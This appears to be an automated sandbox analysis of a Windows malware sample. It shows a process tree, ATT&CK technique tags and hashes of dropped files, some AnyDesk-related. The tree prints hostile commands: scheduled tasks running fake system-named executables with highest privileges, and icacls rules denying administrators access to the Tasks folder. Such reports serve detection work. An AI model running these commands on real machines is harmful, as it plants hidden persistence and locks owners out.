schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\runtimeMonitor\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\runtimeMonitor\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\Installer\{90140000-002A-0000-1000-0000000FF1CE}\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\timeout.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\timeout.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Sidebar\es-ES\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\es-ES\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\es-ES\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\runtimeMonitor\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\runtimeMonitor\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\runtimeMonitor\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2708

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
PID:2684

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:968

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
PID:2124

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:1164

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "ORXGKKZC$:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1660

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
PID:2592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
4⤵
PID:2296

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
5⤵
PID:1616

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
PID:1736

C:\Windows\TEMP\~Mp3055.tmp\~Ma4650.exe
"C:\Windows\TEMP\~Mp3055.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"
4⤵
PID:2972

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
PID:2548

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
2KB

MD5
2bfbc2dad878bed19cedf212be96b87c

SHA1
f0d7c7a57184514706c6427ed8c747da7fac4eb4

SHA256
7c70ce3ec15fa43f4ec33b27f226ccf0e4582d6fafbfb6baa9c7a963ceaf3ad1

SHA512
7f7855c88d81f733da691384937d5dae5548ab350d6296f4dfec1d2f2957a24c9b5aa665aba5501d5c28171838edb50c7bffe7e79934e0699af684a45fd1645c

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
2KB

MD5
e5f6a7165a58ee82b962530cfb951a25

SHA1
1506e6ad3c13b9dc47cee8fb441867e6dde2f3bc

SHA256
bb56ee56e6ea7a3b8b2702dc0e9b58529596cf55529b60da45cebc6d4e6ce723

SHA512
15b8bae4a0cbb67577589570633789e1c25dd304c493b31d21eb07c3c574df196b9815020750593dfc47b82e38b64b8631f979af2dc50677036ad1758da55e7b

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
58B

MD5
77ae1fc149007f8910f5d869c0c047b7

SHA1
3132b12bf5f45520497d7ed2392fc4a2448ab805

SHA256
904c374bb4bc06ce3c1d4ffb173199dfb93c17f3403d9a4fcf65c66639116912

SHA512
1ad9b1fc52bbd43c80b6d6354fb0bd3e1a1ffa1eb6e4991aa791cff180b12489c1a5649f1367cd31fea5f41a55c8045de1ff851931fbeb564f326364fe7b61b8

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
482B

MD5
4a197c5be728ab5c1e917ca3893cb1f0

SHA1
6d99137ad4891e6dc27d44638ba4a5d708849c49

SHA256
be74208880aa6b0340f45d81951149b7e0949d88e88a7ba946070823e4c8172c

SHA512
f093aa7a67cea47b806e525b5d2be5b608459a887d5f80bb3f5c3cb2b7ea7944e8c11394af02729ef497bcc94a28c63acf75ff5011ca373c57ecfef4cd6077d0

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
482B

MD5
4a197c5be728ab5c1e917ca3893cb1f0

SHA1
6d99137ad4891e6dc27d44638ba4a5d708849c49

SHA256
be74208880aa6b0340f45d81951149b7e0949d88e88a7ba946070823e4c8172c

SHA512
f093aa7a67cea47b806e525b5d2be5b608459a887d5f80bb3f5c3cb2b7ea7944e8c11394af02729ef497bcc94a28c63acf75ff5011ca373c57ecfef4cd6077d0

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
482B

MD5
4a197c5be728ab5c1e917ca3893cb1f0

SHA1
6d99137ad4891e6dc27d44638ba4a5d708849c49

SHA256
be74208880aa6b0340f45d81951149b7e0949d88e88a7ba946070823e4c8172c

SHA512
f093aa7a67cea47b806e525b5d2be5b608459a887d5f80bb3f5c3cb2b7ea7944e8c11394af02729ef497bcc94a28c63acf75ff5011ca373c57ecfef4cd6077d0

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
691B

MD5
ebf2ab0995c3e78febfa5c3c27fe26b3

SHA1
7bec641e6b296111caad50f86427d3dcbecc9210

SHA256
b11e29dbd533bf5961999c9088ff94fd103b6d4c4a1c88780c7bc069b657a37d

SHA512
0a0f6a04f42b7527b9b13ab67986a1d10a09a147b01c37b8373d5c32eb4abe3e263fa705cceae0b780892968ece452d1ac1310e64156874aa8e547b7c8aaf6cd

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
691B

MD5
ebf2ab0995c3e78febfa5c3c27fe26b3

SHA1
7bec641e6b296111caad50f86427d3dcbecc9210

SHA256
b11e29dbd533bf5961999c9088ff94fd103b6d4c4a1c88780c7bc069b657a37d

SHA512
0a0f6a04f42b7527b9b13ab67986a1d10a09a147b01c37b8373d5c32eb4abe3e263fa705cceae0b780892968ece452d1ac1310e64156874aa8e547b7c8aaf6cd

Download Submit
C:\ProgramData\any.exe

Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe

Filesize
5.2MB

MD5
104023cef829fce3e34bf1514daff629

SHA1
b6e7b949109298ec7ff1aa64404a859b5b41ccae

SHA256
15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

SHA512
efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

Download Submit
C:\ProgramData\dc.exe

Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\migrate.exe

Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
C:\ProgramData\wsappz.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\wsappz.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
4KB

MD5
11727fd1075845b1ed7607cdab5f0ba7

SHA1
63580eeb84e63f7f8dd8ac31bd4743fb69f244c2

SHA256
d533a94e69e520db148fb656990e5fbf10c06ceea282bae66923f166e8eee57e

SHA512
945e8b59f7e147ff22173ee81abd01c13ce46aa71d96b867113582d5a7a9257e3741cd8a9fcf6a93858cdb534d9ca84d774e1ce43611da6762ef152ed20be834

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

Filesize
8KB

MD5
fd7d734345a73a73eacdaa7effafb8df

SHA1
ee0377aa2f85bdb80933262e181316af06a1972f

SHA256
b1b54d9bfe2a4078eb5313ed2bef643c32d065ab62566352a8936d155d4f941e

SHA512
dc2a68984d4ef5e21d89007599c8bbf65f544b32be1b6a688a42090da7d9bc794b2da1d5f16c67708e43e7f7a7855a37b2526baa7b4244c011ef5cf6a39fbaa3

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

Filesize
1KB

MD5
52010792f4f5b9d0f43cc4b13e7beea6

SHA1
fc1ebc533b310b56ffe20463c9de382aef68691e

SHA256
11bd5be83332c3fe27d1e2f358f721f937603d9a7390d2ddcd9edb105816b672

SHA512
351ef7fd29c3d6e12ee4550f84f7bb62dc3ecb1afc29593677b618ee6db3861b6d1d30148688e1ff8f681e386cd6e6f2df97c9ccaf41c06864b972e833390500

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ef6f878221cd9873599a172c55b732f6

SHA1
f2610167e310aa8a3c1ace7c09d1c2a3b9c64cb8

SHA256
51e87eadb900bfd7bb44d6a68fba4232bf5a00539d912faaea3d3a70eb2a9042

SHA512
a588c1b55c1d634795f7ff1f02ddf6c91fd19090fa9545468c4bd5d6e6d6146698aae7c4491903ddd247053abf267ba32a5b176f40e3bb536e4f4a3744f64c32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ef6f878221cd9873599a172c55b732f6

SHA1
f2610167e310aa8a3c1ace7c09d1c2a3b9c64cb8

SHA256
51e87eadb900bfd7bb44d6a68fba4232bf5a00539d912faaea3d3a70eb2a9042

SHA512
a588c1b55c1d634795f7ff1f02ddf6c91fd19090fa9545468c4bd5d6e6d6146698aae7c4491903ddd247053abf267ba32a5b176f40e3bb536e4f4a3744f64c32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ef6f878221cd9873599a172c55b732f6

SHA1
f2610167e310aa8a3c1ace7c09d1c2a3b9c64cb8

SHA256
51e87eadb900bfd7bb44d6a68fba4232bf5a00539d912faaea3d3a70eb2a9042

SHA512
a588c1b55c1d634795f7ff1f02ddf6c91fd19090fa9545468c4bd5d6e6d6146698aae7c4491903ddd247053abf267ba32a5b176f40e3bb536e4f4a3744f64c32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ef6f878221cd9873599a172c55b732f6

SHA1
f2610167e310aa8a3c1ace7c09d1c2a3b9c64cb8

SHA256
51e87eadb900bfd7bb44d6a68fba4232bf5a00539d912faaea3d3a70eb2a9042

SHA512
a588c1b55c1d634795f7ff1f02ddf6c91fd19090fa9545468c4bd5d6e6d6146698aae7c4491903ddd247053abf267ba32a5b176f40e3bb536e4f4a3744f64c32

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c0732bc3f4d607e17fa372edf2b09fcd

SHA1
bcb803b1e6c5a939ab1f97527c2c5afbfa259ea6

SHA256
8e49a7ed1679f78c56e1c39aaac7bb51c2762a1d034f7412a502f94bdae12b82

SHA512
53e15e03210cb2161af57f292c84985e89612d6bc6edda14398cbb98c8db3e08de661091cd8606e832903768610b21c5a70ee49303027dd4357642ebebc93b06

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4f4b34bf88b10463d2b364f9607e5f16

SHA1
f7b7adb0122ae179143dace8d5c1a75925c67fa3

SHA256
59a2bb535373ee7191e75e8d536e2dffe8b707f33c944c71589d867d957207bc

SHA512
f839aae6547ce1ec4d68b647a1605bcf4d9053a8138bef4958327815f42b2930dc59ee6d285ac0221271eb3e96e5bb461aa0c8cdf4cc714e29a5b34d991e6b98

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
39b24518b95dc374a3b205bc1ec8d023

SHA1
076ef254cdb484c509e44d2705476475acfb90e2

SHA256
da1ef4de3afc1e674566dd30aa18a7cf5a76b163985225a4f7f598cd2f3d6e75

SHA512
41f94191ae2b7c2d00dfaa0823e21be75dde0fe7e2bd3e24098d385936580531aa75923ee5887682a5b0ed1a58fdcd51ea095bfa870380135c3058b5329bff76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
39b24518b95dc374a3b205bc1ec8d023

SHA1
076ef254cdb484c509e44d2705476475acfb90e2

SHA256
da1ef4de3afc1e674566dd30aa18a7cf5a76b163985225a4f7f598cd2f3d6e75

SHA512
41f94191ae2b7c2d00dfaa0823e21be75dde0fe7e2bd3e24098d385936580531aa75923ee5887682a5b0ed1a58fdcd51ea095bfa870380135c3058b5329bff76

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
233B

MD5
cd4326a6fd01cd3ca77cfd8d0f53821b

SHA1
a1030414d1f8e5d5a6e89d5a309921b8920856f9

SHA256
1c59482111e657ef5190e22de6c047609a67e46e28d67fd70829882fd8087a9c

SHA512
29ce5532fb3adf55caa011e53736507fbf241afee9d3ca516a1d9bffec6e5cb2f87c4cd73e4da8c33b8706f96ba3b31f13ce229746110d5bd248839f67ec6d67

Download Submit
C:\programdata\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\programdata\any.bat

Filesize
2KB

MD5
7189281b9182a9a412a92af69b77c836

SHA1
d98322de39d62e8d5e6f8fb7fe2ce30f578a4853

SHA256
baae6af47a9b83c57269d62cf17e4d68927adee93e5567ce2bb5ae33cbe845eb

SHA512
211be9213611bdbd44b2dac2462d0688c02f352c6c55cc6602d84b0a8ceff9a96ca79f6989ce825c8ecedf65fb13e6583fb92fb56c551bf61948320f12cbb6be

Download Submit
C:\programdata\any.exe

Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\programdata\dc.exe

Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\programdata\ru.bat

Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\runtimeMonitor\ComdriverSvc.exe

Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\runtimeMonitor\ComdriverSvc.exe

Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\runtimeMonitor\PsYm20I.bat

Filesize
36B

MD5
13e52857c334ca3b14c44cffece40607

SHA1
eaa9d704385cec30f7841ef6d3c051b225007dbe

SHA256
4e457ab29e89a42a805b427decc8e571e15d857061c939ee7aa8d0bcaff25a6c

SHA512
4b0c23faad00995254ae02b5ce55de33344f66120f1e8640d80059d7cf77f3b149c46ae24bdd459881ef332331cc59e6fc50e55c1fa1a585f63dbf5badb93337

Download Submit
C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe

Filesize
